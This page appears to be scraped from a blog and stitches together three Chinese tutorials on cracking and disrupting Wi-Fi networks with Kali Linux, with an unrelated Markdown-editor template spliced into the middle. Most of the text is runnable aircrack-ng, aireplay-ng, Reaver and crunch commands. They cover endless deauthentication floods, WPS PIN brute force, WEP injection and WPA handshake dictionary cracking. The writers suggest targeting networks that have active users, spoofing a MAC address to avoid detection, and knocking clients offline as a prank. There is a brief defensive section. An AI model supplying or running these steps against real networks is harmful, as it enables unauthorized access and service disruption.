kali无线网攻击 linux

2019-04-30 18:15:51 chenweida1 阅读数 2563

第一章:搭建渗透环境测试环境

(1)主要内容是介绍如何安装kali linux,包括在物理机和虚拟机上的安装和VMware Tools的安装,过程和网上教程大同小异。
(2)介绍什么是渗透测试
定义:通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。包括对系统的任何弱点、技术缺陷或漏洞的主动分析。
(3)两种渗透测试
白盒测试:攻击者将拥有所有内部知识,并可以在不需要害怕被阻断的情况吓任意地实施攻击。
黑盒测试:模拟攻击者的入侵行为,并在不了解客户组织大部分信息和只是的情况下实施的。

第二章:WiFi网络的构成

(1)WiFi是一个建立于IEEE 802.11标准的无线局域网络(WLAN)设备。
(2)WiFi工作原理AP(Access Point 例如:无线路由器)每100ms将SSID(Service Set Identifier)经由beacons(信号台)封包广播一次。
(3)802.11协议介绍以及无线AP的配置:TP-LINK 和 360随身wifi

第三章:监听WiFi网络

#3.1 网络监听原理:
由于无线网络中信号的发送是广播模式发送,所以用户可以在传输过程中截获这些信息。想要截获所有信号,需要将无线网卡设置为监听模式。
#3.2 配置无线网卡
查看无线网卡配置:iwconfig
查看本机网络配置:ifconfig
#3.3 设置监听模式
3.3.1 Aircrack-ng工具介绍
Aircrack-ng是一款与802.11标准的无线网络分析有关的安全软件
功能:侦测、数据包嗅探、WEP和WPA/WPA2-PSK破解
3.3.1 启动监听模式
通过ifconfig查看网卡是否被识别以及是否已经激活,如果没有激活:ifcongfig wlan0 up
先将可能影响监听模式的进程kill :airmon-ng check kill
开启监听模式:airmon-ng <start|stop> <interface> [channel]

在这里插入图片描述如图使用iwconfig可以看到网卡模式为Monitor(监听)。

#3.4 扫描网络范围
3.4.1 使用airodump-ng 扫描
airodumo-ng是Aircrack-ng套件中的一个小工具,该工具主要用来捕获802.11数据报文。通过查看捕获报文,扫描附近AP的SSID、BSSID、信道、客户端的MAC及数量等。
语法:airodump-ng [选项] <interface name>
选项有很多,通过–help来查看
我们使用:airodump-ng wlan0mon 来扫描附近的无线网络,手动Ctrl+C停止扫描
在这里插入图片描述可以看到扫面结果,下面对每个参数进行介绍:
BSSID:这个很简单,我们可以看出来是AP的MAC地址
PWR:网卡报告信号水平,信号值越高说明离AP越近。如果所有PWR=-1,说明我们的网卡驱动不支持报告信号水平。
Beacons:无线AP发出的通告编号,每个接入点(AP)在最低速率(1M)时差不多每秒会发送10个左右的beacon,所以他们在很远的地方就被发现。
#Data:被捕获到的数据分组的数量
#/s:过去10秒钟内每秒捕获数据分组的数量
CH:信道号(从Beacon中获取)
MB:无线AP所支持的最大速率
ENC:使用的加密算法体系
CIPHER:检测到的加密算法
AUTH:使用的认证协议
ESSID:也就是所谓的SSID号,就是我们的wifi名称

第四章:捕获数据包

#4.1 数据包简介
三种包:握手包(4次握手),非加密包,加密包

#4.2 使用Wireshark捕获数据包
Wireshark是一个最知名的网络封包分析软件
4.2.1 捕获非加密模式的数据包
4.2.2-4.2.4介绍了三种数据包的捕获,需要注意的是想要显示某个wifi下数据包协议的话,需要加入wifi的名称和密码。加入方式:编辑–首选项–protocols–IEEE 802.11 --Edit…–添加。

#4.3使用伪AP

第五章: 分析数据包

#5.1 Wireshark简介
Wireshark可以截取网络封包,并且可以尽可能详细地显示网络封包资料。
设置捕获过滤器,捕获所需要的网络包,通过显示过滤器过滤出想要分析的包。主要是学习其中的过滤语法,可以参考其他人写的CSDN博客,例如:https://blog.csdn.net/wojiaopanpan/article/details/69944970 还有很多类似的博客。
接下来介绍了WEP WPA认证包的捕获和分析。以及如何在wireshark捕获信息界面中增加内容列。

第六章:获取信息

对渗透目标进行信息收集,BSSID,ESSID,CH,等等。

第七章:WPS加密模式(重要)

#7.1 WPS简介
WPS加密使得用户连接wifi时很方便,用户只需按路由器上的WPS键或者输入PIN码就可以接入wifi。
WPS的漏洞:PIN码时8位十进制构成,最后一位可以由前面7位算出,验证时先检测前4位,如果一致会得到一个反馈信息,所以只需扫描10000次就一定可以获得前4位PIN码,接下来最多扫描1000次既可确定后四位,pin时速度最快为2s/pin。这样即可暴力破解PIN码。一般路由器中显示的QSS功能就是WPS功能。
#7.3破解WPS加密
7.3.1 使用Reaver工具暴力破解
该工具会尝试一系列的PIN码,正确破解PIN码值后,还可以回复WPA/WPS2密码.

reaver -i wlan0mon -b 11:22:33:44:55:66 -p 12345678(#PIN)

如上,如果知道PIN码是可以秒解wifi密码的。如果没有的话只能通过暴力破解,需要很长时间,只要用户有足够长的时间,就可以破解出WPA或WPA2的密码。

reaver -i wlan0mon -b 11:22:33:44:55:66 -vv

在不知道PIN码的情况下,通过暴力破解,大约需要2~14小时。期间可能会将路由器PIN死,所以我们需要保存PIN进度,用以以后再PIN(这部分看网上教程)。值得注意的是,通过该方法破解路由器需要一个较强的信号。

#7.3.2 使用Wifite工具
该工具只支持Linux操作系统,
– i 指定捕获无线接口
– c 指定信道
– b 指定AP的BSSID
– wpa 指定仅扫描wpa加密网络
– wps 指定仅扫描wps加密网络
– pps 指定每秒注入的包数
通常该工具可以用来判断网络中那些AP使用了何种加密方式,使用下面命令简单快捷判断出附近wifi的加密类型

wifite -pps 660

第八章:破解WEP加密WIFI

WEP加密原理:基于RC4的序列加密算法,使用密钥生成伪随机密钥流序列与明文数据进行异或来生成密文。
现在通过WEP加密的wifi很少了,主要是该加密方式已经出现100%破解办法,通过抓包注入,获取足够的数据包,即可彻底瓦解WEP机密。
破解方法:使用Aircrack-ng 工具破解
(1):airmon-ng check kill 杀掉影响网卡的进程
(2):airmon-ng start wlan0 开启网卡监听模式
(3):airodump-ng wlanmon 扫面附近wifi,查看有没有WEP可以利用,Ctrl+C结束
(4):airodump-ng --ivs -w 保存文件名 --bssid 11:22:33:44:55:66 -c 信道 wlan0mon
当Data达到一定数量时,一万以上,可以尝试进行密码破解。
(5):aircrack-ng wireless-01.ivs 通过所捕获的数据包进行破解,无需密码字典,因为通过大量的数据包可以推出WEP加密的密钥。

第九章:破解WPA加密wifi

由于WPA/WPA2加密的wifi破解需要用到强大的密码字典,本章介绍了生成字典的工具crunch,下面介绍简单用法:

crunch [minimum length] [maximum length] [character set] [options]
eg: crunch 1 6 abcdef -o password.txt 通过-o指定保存文件
cat /usr/share/crunch/charset.lst 中有很多库文件,我们可以通过-f指定使用哪一个库文件
eg: crunch 1 8 -f /usr/share/crunch/charset.lst mixalpha -o password.txt

– b 指定文件最大字节数
– c 指定密码个数
– d 限制出现相同元素的个数。例如-d 3 就不会出现zzffgg
– 0 指定输出位置
– p 定义密码元素

使用Aircrack-ng工具破解WPA
(1):为了尽可能不被发现,首先修改当前网卡的MAC地址

airmon-ng stop wlan0mon (关闭监听模式)
macchanger --mac 00:11:22:33:44:55 wlan0(修改无线网卡的MAC)

(2):杀影响进程,开监听

airmon-ng check kill
airmon-ng start wlan0

(3):查看附近wifi

airodump-ng wlan0mon    (此时也可以用wifite查看附近WiFi,能够给出目标是否WPS加密,但是给不出mac)

(4):选择渗透目标,监听捕获握手包

airodump-ng -c 11 -w huawei --bssid 目标mac wlan0mon (指定信道,保存文件,目标AP的mac)

(5):另外开启一个终端,使用泛洪攻击目标WiFi,迫使客户端重连以获取握手包

aireplay-ng -0 10 -a 目标MAC -c 客户端mac wlan0mon
-0 表示使用泛洪攻击模式,后面的10表示攻击次数,如果是0的话表示循环攻击
-a 指定攻击目标APmac
-c 指定攻击客户端mac

这个时候客户端会被迫重连,正常情况在另一个终端就可以看到获取到了握手包。获取到了4个文件,我们需要 .cap文件来破解密码。
(6):通过.cap文件破解密码

aircrack-ng -w /usr/share/wordlists/rocrack.txt  huawei.cap    (-w 指定使用字典)

接下来就是跑字典了,如果字典中有该密码,就可以成功破解,没有的话就需要换字典了。

总结:

攻击流程:
(1)对于WEP加密模式:使用aircrack-ng工具包就可以破解了,具体操作上文有详细步骤
(2)对于WPA/WPA2加密模式,判断是否有WPS加密,如果有的话可以使用PIN码暴力破解,这种办法只要时间足够,是一定可以破解出来的。如果目标AP没有使用WPS加密的话,我们采用一般的暴力破解办法进行破解。通过抓取握手包进行暴力破解,这种情况主要是看字典强度还有看运气,如果密码过于复杂,字典中没有对应的密码,则不可能破解出来的,对于一个普通的密码,只要有一个好的密码字典,还是可以轻而易举得破解出来的。字典可以使用crunch构造,例如构造出手机号码字典用于尝试破解WiFi。

防范措施:
(1):尽量不要使用WEP加密模式,该模式极度不安全,能够利用漏洞达到100%破解
(2):关闭WPA/QSS(WPS),针对WPS漏洞的利用可是可以100%破解WiFi密码的
(3):禁止SSID广播
(4):启用MAC地址过滤
(5):设置比较复杂的密码

新的改变

ON我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客:

  1. 全新的界面设计 ,将会带来全新的写作体验;
  2. 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示;
  3. 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示;
  4. 全新的 KaTeX数学公式 语法;
  5. 增加了支持甘特图的mermaid语法1 功能;
  6. 增加了 多屏幕编辑 Markdown文章功能;
  7. 增加了 焦点写作模式、预览模式、简洁写作模式、左右区域同步滚轮设置 等功能,功能按钮位于编辑区域与预览区域中间;
  8. 增加了 检查列表 功能。

功能快捷键

撤销:Ctrl/Command + Z
重做:Ctrl/Command + Y
加粗:Ctrl/Command + B
斜体:Ctrl/Command + I
标题:Ctrl/Command + Shift + H
无序列表:Ctrl/Command + Shift + U
有序列表:Ctrl/Command + Shift + O
检查列表:Ctrl/Command + Shift + C
插入代码:Ctrl/Command + Shift + K
插入链接:Ctrl/Command + Shift + L
插入图片:Ctrl/Command + Shift + G

合理的创建标题,有助于目录的生成

直接输入1次#,并按下space后,将生成1级标题。
输入2次#,并按下space后,将生成2级标题。
以此类推,我们支持6级标题。有助于使用TOC语法后生成一个完美的目录。

如何改变文本的样式

强调文本 强调文本

加粗文本 加粗文本

标记文本

删除文本

引用文本

H2O is是液体。

210 运算结果是 1024.

插入链接与图片

链接: link.

图片: Alt

带尺寸的图片: Alt

居中的图片: Alt

居中并且带尺寸的图片: Alt

当然,我们为了让用户更加便捷,我们增加了图片拖拽功能。

如何插入一段漂亮的代码片

博客设置页面,选择一款你喜欢的代码片高亮样式,下面展示同样高亮的 代码片.

// An highlighted block
var foo = 'bar';

生成一个适合你的列表

  • 项目
    • 项目
      • 项目
  1. 项目1
  2. 项目2
  3. 项目3
  • 计划任务
  • 完成任务

创建一个表格

一个简单的表格是这么创建的:

项目 Value
电脑 $1600
手机 $12
导管 $1

设定内容居中、居左、居右

使用:---------:居中
使用:----------居左
使用----------:居右

第一列 第二列 第三列
第一列文本居中 第二列文本居右 第三列文本居左

SmartyPants

SmartyPants将ASCII标点字符转换为“智能”印刷标点HTML实体。例如:

TYPE ASCII HTML
Single backticks 'Isn't this fun?' ‘Isn’t this fun?’
Quotes "Isn't this fun?" “Isn’t this fun?”
Dashes -- is en-dash, --- is em-dash – is en-dash, — is em-dash

创建一个自定义列表

Markdown
Text-to-HTML conversion tool
Authors
John
Luke

如何创建一个注脚

一个具有注脚的文本。2

注释也是必不可少的

Markdown将文本转换为 HTML

KaTeX数学公式

您可以使用渲染LaTeX数学表达式 KaTeX:

Gamma公式展示 Γ(n)=(n1)!nN\Gamma(n) = (n-1)!\quad\forall n\in\mathbb N 是通过欧拉积分

Γ(z)=0tz1etdt&ThinSpace;. \Gamma(z) = \int_0^\infty t^{z-1}e^{-t}dt\,.

你可以找到更多关于的信息 LaTeX 数学表达式here.

新的甘特图功能,丰富你的文章

Mon 06Mon 13Mon 20已完成 进行中 计划一 计划二 现有任务Adding GANTT diagram functionality to mermaid
  • 关于 甘特图 语法,参考 这儿,

UML 图表

可以使用UML图表进行渲染。 Mermaid. 例如下面产生的一个序列图::

张三李四王五你好!李四, 最近怎么样?你最近怎么样,王五?我很好,谢谢!我很好,谢谢!李四想了很长时间,文字太长了不适合放在一行.打量着王五...很好... 王五, 你怎么样?张三李四王五

这将产生一个流程图。:

链接
长方形
圆角长方形
菱形
  • 关于 Mermaid 语法,参考 这儿,

FLowchart流程图

我们依旧会支持flowchart的流程图:

Created with Raphaël 2.2.0开始我的操作确认?结束yesno
  • 关于 Flowchart流程图 语法,参考 这儿.

导出与导入

导出

如果你想尝试使用此编辑器, 你可以在此篇文章任意编辑。当你完成了一篇文章的写作, 在上方工具栏找到 文章导出 ,生成一个.md文件或者.html文件进行本地保存。

导入

如果你想加载一篇你写过的.md文件或者.html文件,在上方工具栏可以选择导入功能进行对应扩展名的文件导入,
继续你的创作。


  1. mermaid语法说明 ↩︎

  2. 注脚的解释 ↩︎

2018-03-16 23:06:17 qq_37367124 阅读数 44053

接触kali linux系统之后,基本命令使用的多了也就记下了,慢慢的我将重点转到了攻击,目前是wifi和局域网的攻击,以后有新的经验和体会我会再分享的。有一些东西也是学习其他大牛的,莫要嘲笑才是啊大笑

好了进入主题:Aircrack-ng wifi 攻击 

Aircrack是破解WEP/WPA/WPA2加密的主流工具之一,现在排名第一,受广大小伙伴的喜爱,Aircrack-ng套件包含的工具可用于捕获数据包、握手验证。可用来进行暴力破解和字典攻击。

Aircrack-ng 攻击 主要是拿到握手包,用字典破解握手包,什么是握手包?看到后面你就知道了。
它侧重于WiFi安全的不同领域:

监控:数据包捕获并将数据导出到文本文件以供第三方工具进一步处理。
攻击:通过数据包注入重播攻击,解除身份验证,假接入点和其他攻击点。
测试:检查WiFi卡和驱动程序功能(捕获和注入)。
破解:WEP和WPA PSK(WPA 1和2)。
所有的工具都是命令行,它允许重型脚本。很多图形用户界面都利用了这一功能。它主要适用于Linux,但也适用于Windows,OS X,FreeBSD,OpenBSD,NetBSD,以及Solaris甚至eComStation 2。如下命令:

– Aircrack-ng 无线密码破解
– Aireplay-ng 流量生成和客户端认证
– Airodump-ng 数据包捕获
– Airbase-ng  虚假接入点配置

步骤:

1. 你需要买一个无线网卡,像我这个适合kali虚拟机,RTL8187L 无线网卡前几天刚买的就是为了玩wifi攻击,嘿嘿,也不贵不到40


然后就要配置网卡,也没什么可操作性,买回来直接插上USB接口它会自动安装驱动,没有自动安装的你可以问店家让他发你驱动,安装后就可以。然后打开kali虚拟机如下:点击连接网卡进行连接



2.连接之后进入虚拟机终端,键入第一个命令

airmon-ng check kill

如下:


K掉影响网卡的进程,一般情况下,每次重启或者开机后这些进程都会自己开始,因此第一次使用都需要K掉这些进程(之后只要不重启或者关机都不用再次键入这个命令,直接开启就行,也就是第二个命令)

3.键入第二个命令:

airmon-ng start wlan0

开启网卡。如下:


这个时候你的网卡名为 wlan0mon,有的时候不会改变还是wlan0,注意一下就行,后面的mon是monitor的缩写,即监控。

3.接下来就是wifi嗅探了,查看当前区域内的所有wifi,键入命令:

airodump-ng wlan0mon


显示很多信息,而且是动态的,你只需要知道四个东西就行了: 

BSSID:wifi路由的 Mac地址, 

Data 当前wifi数据大小,有数据就表明有人正在使用,你就可以把它作为一个选择了。

CH :渠道,后面的攻击要用到。 

ESSID: wifi的 名字。还有,他的排序是按信号的强弱来排序的,越往上信号越强。PWR 是强度,不用记,慢慢的就知道了。

经过观察之后选择一个你想破解或者攻击的wifi,前提是它得有数据显示,Date的那列,所以选择攻击的wifi最好先从Date看起来,选择一个有数据的wifi之后按Ctrl+c 停止检测,复制你选择的Mac地址。

4.键入第三步命令:

airodump-ng -c 1 --bssid 28:6C:07:53:53:80  -w ~/Desktop/cap/2.4G wlan0mon

解释一下 -c 是 渠道  bssid 是路由的Mac地址 ~w是放包的目录~/Desktop/cap 是放包的文件夹,2.4G是包的命名,包命名最好以wifi名的关键字,像我选择的Wifi中有2.4G这样的关键字,我在桌面建立了一个文件夹,包括抓到的包cap和密码包passwd,这些细节性的东西小伙伴们一定要注意看清楚哈!抓的包放在那里,密码字典放在那里,起的名是什么要知道。


所以为方便起见,你最好建立专门的文件夹.

抓包如下:


从上面动态信息可以看出目前有4个连接,这就可以进行洪水攻击然后拿到握手包,如果刚进去没有看到任何连接,先等待20秒左右,还是没有的话你就得重新选择目标了。在这里说明一下,要想抓到握手包就得进行洪水攻击,攻击的时候连接路由器的手机或者电脑会断开连接然后会自动连接wifi,连接的过程中就有一个数据的传送,而上面的airodump-ng就是要抓取这些数据。拿到需要破解的握手包即  .cap  文件

5.进行洪水攻击,保持上面的窗口不要关闭,重新开一个窗口键入第四个命令:

aireplay-ng -0 0 -a 28:6C:07:53:53:80 wlam0mon

0 表示不断攻击 ,这个命令也可以理解为:让当前路由下的所有连接断开,要是搞恶作剧的话你可以试试哈!

攻击如下



这个时候就注意抓包的窗口,出现WPA handshake :   ,就表示成功。如果有连接很快就可以抓到包




然后就进行跑包了,这里说一下,要跑包就需要密码字典,我这里给一个,链接: https://pan.baidu.com/s/1_6ADb5YtdJ5E6uDdP_dC1Q   密码: t69n

你也可以去网上下载,

6.密码破解 , 键入第五个命令:

aircrack-ng -w ~/Desktop/passwd/408.txt ~/Desktop/cap/2.4G-01.cap


前面是密码包的位置,后面是抓到包的位置,破解的是  .cap 文件。如下:


跑包是一件很苦逼的事情,但是能破解的话也是无所谓啦~~

这就要靠你的运气和密码包的强大了!成功后会出现:


好了到这里就结束了!

嘿嘿!每一步看起来都很简单,但是刚开书实际操作并非你想象的那么easy,你得注重每一个细节,这些往往是你能不能成功的关键!有的时候是相当的艰难,但是也充满着乐趣,这是爱好仅此而已,相信也有好多像我一样的小伙伴,或许是大牛,或许也是刚刚起步碰到各种困难。不过一切都不是问题,每次解决一个问题你都会向前进一步。

2020-03-24 22:01:51 m0_46637278 阅读数 517

无线攻击篇

持续更新中~ 下次更新尽量一个月内吧,有些地方还是晦涩难懂。

蓝牙工具集合

无线工具集合

iwconfig

系统配置无线网络设备或显示无线网络设备信息的命令。iwconfig命令类似于ifconfig命令,但是他配置对象是无线网卡,它对网络设备进行无线操作,如设置无线通信频段

参数说明

iwconfig interface [选项]

Usage: iwconfig [interface]
	interface essid {NNN|any|on|off}
	interface mode {managed|ad-hoc|master|...}
	interface freq N.NNN[k|M|G]
	interface channel N
	interface bit {N[k|M|G]|auto|fixed}
	interface rate {N[k|M|G]|auto|fixed}
	interface enc {NNNN-NNNN|off}
	interface key {NNNN-NNNN|off}
	interface power {period N|timeout N|saving N|off}
	interface nickname NNN
	interface nwid {NN|on|off}
	interface ap {N|off|auto}
	interface txpower {NmW|NdBm|off|auto}
	interface sens N
	interface retry {limit N|lifetime N}
	interface rts {N|auto|fixed|off}
	interface frag {N|auto|fixed|off}
	interface modulation {11g|11a|CCK|OFDMg|...}
	interface commit 

    auto: 自动模式
    essid:设置ESSID  //设置ESSID(或网络名称——在某些产品中也可以称为域ID)。ESSID用于标识属于同一虚拟网络的单元。与定义单个单元的AP地址或NWID不同,ESSID定义了通过中继器或基础设施连接的一组单元,用户可以在这些单元中透明地漫游。对于某些卡片,您可以使用off或any(和on来重新启用它)禁用ESSID检查(ESSID混杂)。如果您的网络的ESSID是一个特殊的关键字(off、on或any),您应该使用——以转义它。
    nwid:设置网络ID  // 设置网络ID。由于所有相邻的无线网络共享相同的介质,该参数用于区分它们(创建逻辑并列网络)并识别属于同一单元的节点。此参数仅用于802.11之前的硬件,802.11协议使用此功能的ESSID和AP地址。对于某些卡,可以使用off(和on)禁用网络ID检查(NWID混杂)来重新启用它。
    freq: 设置无线网络通信频段/率
    chanel: 设置无线网络通信信道   
    sens: 设置无线网络设备的感知阀值 //适当设置这些阈值可以防止卡在接收微弱信号的同时浪费时间在背景噪声上。默认现在硬件感知都自动化了吧。
    mode: 设置无线网络设备的通信设备
    ap: 强迫无线网卡向给定地址的接入点注册 /使用off来重新启用自动模式,而不需要更改当前的访问点,或者您可以使用any或auto来强制卡与当前最佳的访问点重新关联。
    nick<名字>: 为网卡设定别名
    rate<速率>: 设定无线网卡的速率
    rts<阀值>: 在传输数据包之前增加一次握手,确信信道在正常的
    power: 无线网卡的发射功率设置
    总结:保持默认吧,又不是老古董的网卡了,有特殊需求,恶劣条件下可考虑极限值尝试?

Aircrack-ng

参数说明
> Executing “aircrack-ng --help”

  Aircrack-ng 1.6  - (C) 2006-2020 Thomas d'Otreppe
  https://www.aircrack-ng.org

  usage: aircrack-ng [options] <input file(s)>

  Common options:

      -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)           //强制攻击模式
      -e <essid> : target selection: network identifier                        //目标选择:网络标识符
      -b <bssid> : target selection: access point's MAC                     //目标选择:通过接入点的MAC
      -p <nbcpu> : # of CPU to use  (default: all CPUs)                    //使用的CPU数量;默认全部
      -q         : enable quiet mode (no status output)                          //启用安静模式(无状态输出)
      -C <macs>  : merge the given APs to a virtual one                   //将给定的AP合并为虚拟AP
      -l <file>  : write key to file. Overwrites file.                             //重写文件,将秘匙写入文件中

  Static WEP cracking options:                                                        //静态WEP破解选项:

      -c         : search alpha-numeric characters only
      -t         : search binary coded decimal chr only
      -h         : search the numeric key for Fritz!BOX
      -d <mask>  : use masking of the key (A1:XX:CF:YY)
      -m <maddr> : MAC address to filter usable packets
      -n <nbits> : WEP key length :  64/128/152/256/512
      -i <index> : WEP key index (1 to 4), default: any
      -f <fudge> : bruteforce fudge factor,  default: 2
      -k <korek> : disable one attack method  (1 to 17)
      -x or -x0  : disable bruteforce for last keybytes
      -x1        : last keybyte bruteforcing  (default)
      -x2        : enable last  2 keybytes bruteforcing
      -X         : disable  bruteforce   multithreading
      -y         : experimental  single bruteforce mode
      -K         : use only old KoreK attacks (pre-PTW)
      -s         : show the key in ASCII while cracking
      -M <num>   : specify maximum number of IVs to use
      -D         : WEP decloak, skips broken keystreams
      -P <num>   : PTW debug:  1: disable Klein, 2: PTW
      -1         : run only 1 try to crack key with PTW
      -V         : run in visual inspection mode

  WEP and WPA-PSK cracking options:

      -w <words> : path to wordlist(s) filename(s)
      -N <file>  : path to new session filename
      -R <file>  : path to existing session filename

  WPA-PSK options:

      -E <file>  : create EWSA Project file v3
      -I <str>   : PMKID string (hashcat -m 16800)
      -j <file>  : create Hashcat v3.6+ file (HCCAPX)
      -J <file>  : create Hashcat file (HCCAP)
      -S         : WPA cracking speed test
      -Z <sec>   : WPA cracking speed test length of
                   execution.
      -r <DB>    : path to airolib-ng database
                   (Cannot be used with -w)

  SIMD selection:

      --simd-list       : Show a list of the available
                          SIMD architectures, for this
                          machine.
      --simd=<option>   : Use specific SIMD architecture.

      <option> may be one of the following, depending on
      your platform:

                   generic
                   avx512
                   avx2
                   avx
                   sse2
                   altivec
                   power8
                   asimd
                   neon

  Other options:

      -u         : Displays # of CPUs & SIMD support
      --help     : Displays this usage screen

使用说明
DEAUTHENTICATION攻击
aireplay-ng -0 0 -a kifi -c <Client MAC> <interface name>

0就是无限发包,直至打掉
不指定-c参数时,以广播攻击所有客户端
每攻击发送128个包,64个给AP,64个给客户端
物理足够接近被攻击者
排错:
物理足够接近被攻击者
与被攻击者使用相同无限标准b、n、g
客户端可能拒绝广播帧,建议指定客户端

实战步骤:
查看网卡名字:iwconfig
设置网卡为监听模式:airmon-ng start wlan0
扫描附近的WIFI:airodump-ng wlan0mon
选定一个路由器,并监听其流量:airodump-ng -w tplink -c 11 --bssid {MAC1} wlan0mon
选定连接的一个客户端,进行攻击:aireplay-ng -0 50 -a {MAC1} -c {MAC2} wlan0mon
对抓取到的cap包进行暴力破解:aircrack-ng -w password.txt -b {MAC1} tplink-01.cap
参考:

  1. 查看无线网卡名字:iwconfig 或者 ifconfig -a 都可以

  2. 开启网卡监听模式:airmon-ng start wlan0 。
    网卡开启了监听模式之后网卡的名字就变为 wlan0mon 了,以后的所有命令中的网卡名都是叫 wlan0mon

  3. 扫描附近的WIFI:airodump-ng wlan0mon
    会显示附近所有的WIFI信号。
    显示数据的参数说明:

BSSID :AP端的MAC地址,如果在Client Section中BSSID显示为“not associated”意味着客户端没有和AP连接上
PWR :信号的水平强度,越大越好
Beacons :AP发出的通告编号,每个接入点(AP)在最低速率(1M)时差不多每秒发送10个左右的beacon,所以他们能够在很远的地方被发现
#Data: 对应路由器在线吞吐量,数字越大,数据上传量越大(数据越大表示在正常情况下使用的人越多,选择此目标成功率大些
CH :信号道(对应路由器的所在频道 / 渠道)
MB :连接速度 / AP支持的最大速率,如果:
  +MB=11,它是802.11b
  +MB=22,它是802.11b+
  +MB>22,它是802.11g
ENC :使用的加密算法体系
CIPHER :检测到的加密算法
AUTH :使用的认证协议
  +MGT(WPA/WPA2使用独立认证的服务器,常见的802.1x、redius、eap等)
  +SKA(WEP的共享密钥)
  +OPN(WEP开放式)
ESSID :对应的路由器名称(越往上信号越好)
STATION :客户端的MAC地址
Lost :在过去10s丢失的数据分组
Probes :被客户端查探的ESSID,如果客户端正在试图连接一个AP但是没有连接上,那么就显示在这里。
RXQ :接受质量,用于衡量所有帧和管理所有帧
  1. 选定一个准备破解的WIFI

  2. 监听该路由器的流量:
    airodump-ng -w tplink -c 11 --bssid BC:46:99:3D:66:D6 wlan0mon # -w 参数指定生成的文件名 -c 指定信道 --bssid指定路由器的MAC地址

  3. 重新打开一个命令行窗口,开始攻击!之前的窗口继续保留,用于观察是否抓包成功
    aireplay-ng -0 50 -a BC:46:99:3D:66:D6 -c A0:AF:BD:D8:E6:31 wlan0mon # 50是发包的数量 -a指定路由器的MAC地址 -c指定连接的客户端的MAC地址
    该命令会打断连接客户端和WIFI之间的连接,等到客户端重新连接WIFI的时候,就会抓取他们之间的握手认证包!

  4. 如果看到[ WPA handshake: MAC],就说明握手包抓取成功了

    我们可以在命令行运行的所在目录下,看到会生成四个文件,其中我们有用的文件是以 cap 后缀结尾的文件

  5. 对抓取到的cap包进行破解,这需要我们准备好破解的密码字典。所以,无论是任何破解,都需要一个强大的密码字典!

    kali下自带有一份无线密码字典——> /usr/share/wordlists/rockyou.txt.gz ,我们将其解压

    aircrack-ng -w /usr/share/wordlists/rockyou.txt -b BC:46:99:3D:66:D6 tplink-01.cap #-w指定 密码字典 -b指定路由器的MAC地址

    要想破解出WIFI的密码,需要一个很强大的字典!

其他使用说明

就是采取不同的漏洞进行破解
aireplay-ng -0 10 -a ap_mac -c 合法客户端mac wifi0

参数说明:10表示发送次数(设置为0表示循环攻击,客户端无法正常上网)
-a设置ap的mac地址,-c设置已连接的合法客户端的mac地址(如果要-c则所有与ap连接的客户端全部断线)

-1 fakeauth count 伪装一个客户端和ap进行连接

这是没有客户端研究学习的第一步,因为是没有合法连接的客户端,因此需要一个伪装客户端来和路由器连接。为让ap接受数据包,必须使自己的网卡和ap关联。-1伪装客户端连接成功够才能用发送注入命令

aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0
aireplay-ng -1 0 -e kifi -a <AP MAC> -h <YOUR MAC> <interface>
aireplay-ng -1 60 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>

参数说明:
0表示延迟0秒后连接;
-e设置ap_essid;
-a设置ap的mac地址
-h设置伪装客户端的网卡mac地址(就是自己网卡的mac地址)
-o 1 每次身份认证只发一组认证数据包
-q 10 每10秒发keep-live帧

排错:
某些AP验证客户端MAC地址OUI(前三个字节)——>虚假客户端MAC
MAC地址过滤
Denied(Code 1)is WPA in use
WPA/WPA2不支持Fake authentication
使用真实MAC地址
离信号太远
侦听信道不正确

-2 interactive 交互模式

这个模式集合了抓包和提取数据,发包注入三种功能

ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac wifi0

参数说明:
-p设置控制帧中包含的信息(16进制),默认采用0841;
-c:设置目标mac地址;
-b设置ap的mac地址;
-h伪装的客户端网卡mac地址(就是自己的mac地址)
提取包,发送注入数据包

aireplay-ng -2 -r myarp -x 1024 wifi0

参数说明:
myarp:自己设置的文件名;
-x1024:发包的速度(最大为1024)

-3 arp-request注入攻击模式

这种模式是一种抓包后分析重发的过程
aireplay-ng -3 -b ap_mac -h 合法客户端mac -x 512 wifi0

-4 chopchop攻击模式,用来获得一个包含密钥数据的xor文件
aireplay-ng -3 -b <AP MAC> -h <Source MAC> <interface name>
aireplay-ng -4 -b ap-mac -h my_mac wifi0

参数说明:
-h 合法客户端/ 攻击者MAC
aireplay-ng data 字段
64bit密钥:25W
128bit密钥:150W

-5 fragment 碎片包攻击模式,用来获得PRGA(包含密钥的后缀为xor的文件)

aireplay-ng -5 -b ap_mac -h my_mac wifi0
packetforge-ng 数据包制造程序

packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k 255.255.255.255 -l255.255.255.255 -y niam_xor -w mrarp
参数说明:
-0:伪装arp数据包;
-k:设置目标文件ip和端口;
-l:设置源文件IP和端口;
-y:从xor文件中读取PRGA;
name:xor文件的名字;
-w设置伪装的arp包的文件名

aircrack-ng -n 64 -b ap_mac name-01.ivs
参数说明:
-n设置key长度(64/128/256/512)

Kismet

参数说明
> Executing “kismet -h”
usage: kismet [OPTION]
Nearly all of these options are run-time overrides for values in the kismet.conf configuration file.  //几乎所有这些选项都是kismet.conf配置文件中值的运行时替代。
Permanent changes should be made to.the configuration file. //应该对配置文件进行永久更改
 *** Generic Options ***
 -v, --version                Show version
     --no-console-wrapper     Disable server console wrapper //禁用服务器控制台包装器
     --no-ncurses-wrapper     Disable server console wrapper//禁用服务器控制台包装器
     --debug                  Disable the console wrapper and the crash//禁用控制台包装和崩溃
                              handling functions, for debugging//处理函数,用于调试
 -f, --config-file <file>     Use alternate configuration file//使用备用配置文件
     --no-line-wrap           Turn of linewrapping of output//使用备用配置文件
                              (for grep, speed, etc)
 -s, --silent                 Turn off stdout output after setup phase//使用备用配置文件
     --daemonize              Spawn detached in the background//后面的卒子脱离了
     --no-plugins             Do not load plugins//不要加载插件
     --homedir <path>         Use an alternate path as the home //使用替代路径作为主路径
